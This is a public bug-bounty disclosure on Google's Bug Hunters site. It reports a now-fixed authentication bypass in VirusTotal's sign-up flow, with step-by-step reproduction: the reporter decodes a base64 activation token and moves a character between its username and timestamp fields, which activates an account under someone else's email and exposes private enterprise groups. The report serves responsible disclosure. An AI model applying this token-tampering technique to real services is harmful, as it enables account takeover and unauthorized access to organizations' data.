Skip to Content (Press Enter)
Google
Bug Hunters
A bug in VirusTotal allows to sign up with an arbitrary email address, which results in access to a private enterprise VT group
Reported by:
Chip
Google VRP
triaged
17:15 | Jul 3, 2022
accepted
18:15 | Jul 6, 2022
triaged
20:22 | Apr 21, 2023
accepted
20:26 | Apr 21, 2023
fixed
15:54 | Apr 30, 2023
reward decided
$1,500
Summary:
A bug in VirusTotal allows to sign up with an arbitrary email address, which results in access to a private enterprise VT group
Product:
VirusTotal
URL:
https://www.virustotal.com/ui/signup/confirm
Vulnerability type:
Auth Bypass
Details
Sign up with an arbitrary email address you don't have access to, for example:
Email:
victim@targetdomain.com
Username:
victim
Password:
X#|>.Dl\Ec^8joW#
Sign up with email address you have access to and with specially crafted username:
Email:
yitadev549@jrvps.com
Username:
victim1
Find account activation email was sent to
yitadev549@jrvps.com
, pay attention at the activation link:
https://www.virustotal.com/gui/account-activation/dmljdGltMXx8MTY1Njc1NDMyN3x8MzM1MmRjNzMxMTE1ZTliOTkzZGIyODY3ZjIyOTg0MmUxOGUyNTI3YWFmNDQ1ZjViYzkxYThmMGVlZDRjNWIxYw
Base64 decode string:
dmljdGltMXx8MTY1Njc1NDMyN3x8MzM1MmRjNzMxMTE1ZTliOTkzZGIyODY3ZjIyOTg0MmUxOGUyNTI3YWFmNDQ1ZjViYzkxYThmMGVlZDRjNWIxYw
victim1||1656754327||3352dc731115e9b993db2867f229842e18e2527aaf445f5bc91a8f0eed4c5b1c
.
It has format
username||timestamp||token
.
Transform decoded string to
victim||11656754327||3352dc731115e9b993db2867f229842e18e2527aaf445f5bc91a8f0eed4c5b1c
.
I moved
1
from username to timestamp. Encode it with Base64.
Open activation link with new tampered Base64 string in the browser:
https://www.virustotal.com/gui/account-activation/dmljdGltfHwxMTY1Njc1NDMyN3x8MzM1MmRjNzMxMTE1ZTliOTkzZGIyODY3ZjIyOTg0MmUxOGUyNTI3YWFmNDQ1ZjViYzkxYThmMGVlZDRjNWIxYw==
Account with username
victim
, email
victim@targetdomain.com
and password
X#|>.Dl\Ec^8joW#
will be successfully activated!
This bug leads to access to private enterprise groups, for example, I have tested that it is possible to get access to Kaspersky's enterprise group with email [REDACTED_EMAIL] and password [REDACTED_PASSWORD]. Be sure that I have not performed any violations with this account.
Attack scenario
An attacker can use it to enumerate persons working in the company (enterprise group list), and for using quotas the company paid for, like downloading files or creating retrohunt rules. He can sell accounts with these wide permissions.
It will lead to complaints from your corporate users.
登录
使用 Google 账号登录